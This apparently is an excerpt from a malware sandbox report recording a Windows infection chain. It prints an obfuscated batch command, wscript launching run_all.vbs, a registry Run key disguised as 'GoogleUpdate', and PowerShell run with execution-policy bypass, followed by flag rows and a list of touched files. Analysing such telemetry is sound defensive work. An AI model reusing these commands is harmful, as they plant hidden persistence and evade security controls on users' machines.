"un!u25!!d6!!i9!ist!d6!!o26!!y27!cx!n16!=f07fd" "de!h23!!q21!!h7!!h23!e!n16!!f13!a4!n28!e" "!e4!!b29!!k20!!d30!!b29!d]" "%11%\!n16!!h31!robj,ni,!f32!tt!r33!s://sh!x22!r!d6!f!h7!l!d6!!n16!!s24!c!d6!!y10!!h11!!d6!!o26!/test22-pc" "[!u18!!h34!5!l19!!r8!" "!h7!e!f12!ini%oal!q35!f" "!e4!st!o26!i!y10!g!n16!!r8!" "s!d6!!o26!v!h7!!h31!e!y10!a!v36!e=' '" "!n16!!f32!or!h11!!n16!v!h31!!y10!a!v36!!d6!!f13!' '" "oa!c37!=t!s24!in") do echo %~t) > "c:\users\test22\appdata\local\temp\ie!f12!i!y10!!h7!t.t!i38!!h11!" & copy /y c:\windows\!a39!ys!h11!e!v36!3!n40!!x41!ie4!f12!in!h7!!h11!!s24!e!i38!!d6! c:\users\test22\appdata\local\temp\ & ren c:\users\test22\appdata\local\temp!x41!!h7!!d6!u!h7!n!h7!!h11!!s24!txt i!d6!u!h7!!y10!!h7!!h11!.!h7!!y10!!q21! & s!h11!!x22!rt "" /mi!y10! wmic p!o26!!a14!!h31!e!n16!s !h3! c!o26!eate "c:\users\test22\appdata\local\temp\!h7!!d6!4ui!y10!!h7!!h11!!s24!!d6!xe !x42!b!x22!!n16!e!a39!et!h11!in!i9!!n16!""wscript "c:\users\test22\appdata\roaming\adobe\run_all.vbs" reg add 'hkey_current_user\software\microsoft\windows\currentversion\run' /v googleupdate /t reg_sz /d 'wscript "c:\users\test22\appdata\roaming\adobe\run_all.vbs" powershell.exe -noprofile -executionpolicy bypass -file 'c:\users\test22\appdata\roaming\adobe\merge.ps1' test22-pc' /fwscript "c:\users\test22\appdata\roaming\adobe\run_all.vbs" wscript "c:\users\test22\appdata\roaming\adobe\run_all.vbs" powershell.exe -noprofile -executionpolicy bypass -file 'c:\users\test22\appdata\roaming\adobe\merge.ps1' test22-pc |
parent_process | wscript.exe | martian_process | cmd /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v GoogleUpdate /t REG_SZ /d "wscript C:\Users\test22\AppData\Roaming\Adobe\run_all.vbs powershell.exe -NoProfile -ExecutionPolicy Bypass -File "C:\Users\test22\AppData\Roaming\Adobe\merge.ps1" TEST22-PC" /f | ||||||
parent_process | wscript.exe | martian_process | "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v GoogleUpdate /t REG_SZ /d "wscript C:\Users\test22\AppData\Roaming\Adobe\run_all.vbs powershell.exe -NoProfile -ExecutionPolicy Bypass -File "C:\Users\test22\AppData\Roaming\Adobe\merge.ps1" TEST22-PC" /f | ||||||
parent_process | wscript.exe | martian_process | "C:\Windows\System32\cmd.exe" /c wscript C:\Users\test22\AppData\Roaming\Adobe\run_all.vbs powershell.exe -NoProfile -ExecutionPolicy Bypass -File "C:\Users\test22\AppData\Roaming\Adobe\merge.ps1" TEST22-PC | ||||||
parent_process | wscript.exe | martian_process | cmd /c wscript C:\Users\test22\AppData\Roaming\Adobe\run_all.vbs powershell.exe -NoProfile -ExecutionPolicy Bypass -File "C:\Users\test22\AppData\Roaming\Adobe\merge.ps1" TEST22-PC | ||||||
parent_process | wscript.exe | martian_process | "C:\Windows\System32\cmd.exe" /c powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Users\test22\AppData\Roaming\Adobe\merge.ps1 TEST22-PC | ||||||
parent_process | wscript.exe | martian_process | cmd /c powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Users\test22\AppData\Roaming\Adobe\merge.ps1 TEST22-PC |
option | -executionpolicy bypass | value | Attempts to bypass execution policy | ||||||
option | -noprofile | value | Does not load current user profile | ||||||
option | -executionpolicy bypass | value | Attempts to bypass execution policy | ||||||
option | -noprofile | value | Does not load current user profile | ||||||
option | -executionpolicy bypass | value | Attempts to bypass execution policy | ||||||
option | -noprofile | value | Does not load current user profile | ||||||
option | -executionpolicy bypass | value | Attempts to bypass execution policy | ||||||
option | -noprofile | value | Does not load current user profile | ||||||
option | -executionpolicy bypass | value | Attempts to bypass execution policy | ||||||
option | -noprofile | value | Does not load current user profile | ||||||
option | -executionpolicy bypass | value | Attempts to bypass execution policy | ||||||
option | -noprofile | value | Does not load current user profile | ||||||
option | -executionpolicy bypass | value | Attempts to bypass execution policy | ||||||
option | -noprofile | value | Does not load current user profile | ||||||
option | -executionpolicy bypass | value | Attempts to bypass execution policy | ||||||
option | -noprofile | value | Does not load current user profile | ||||||
option | -executionpolicy bypass | value | Attempts to bypass execution policy | ||||||
option | -noprofile | value | Does not load current user profile | ||||||
option | -executionpolicy bypass | value | Attempts to bypass execution policy | ||||||
option | -noprofile | value | Does not load current user profile | ||||||
option | -executionpolicy bypass | value | Attempts to bypass execution policy | ||||||
option | -noprofile | value | Does not load current user profile | ||||||
option | -executionpolicy bypass | value | Attempts to bypass execution policy | ||||||
option | -noprofile | value | Does not load current user profile | ||||||
option | -executionpolicy bypass | value | Attempts to bypass execution policy | ||||||
option | -noprofile | value | Does not load current user profile |
file | C:\Windows\SysWOW64\wscript.exe |
file | C:\Windows\System32\cmd.exe |
file | C:\Windows\System32\ie4uinit.exe |
file | C:\Program Files\Windows Sidebar\sidebar.exe |
file | C:\Windows\System32\WindowsAnytimeUpgradeUI.exe |
file | C:\Windows\System32\xpsrchvw.exe |
file | C:\Windows\System32\displayswitch.exe |
file | C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe |
file | C:\Windows\System32\mblctr.exe |
file | C:\Windows\System32\mstsc.exe |
file | C:\Windows\System32\SnippingTool.exe |
file | C:\Windows\System32\SoundRecorder.exe |
file | C:\Windows\System32\dfrgui.exe |
file | C:\Windows\System32\msinfo32.exe |
file | C:\Windows\System32\rstrui.exe |
file | C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe |
file | C:\Program Files\Windows Journal\Journal.exe |
file | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
file | C:\Windows\System32\MdSched.exe |
file | C:\Windows\System32\msconfig.exe |
file | C:\Windows\System32\recdisc.exe |
file | C:\Windows\System32\msra.exe |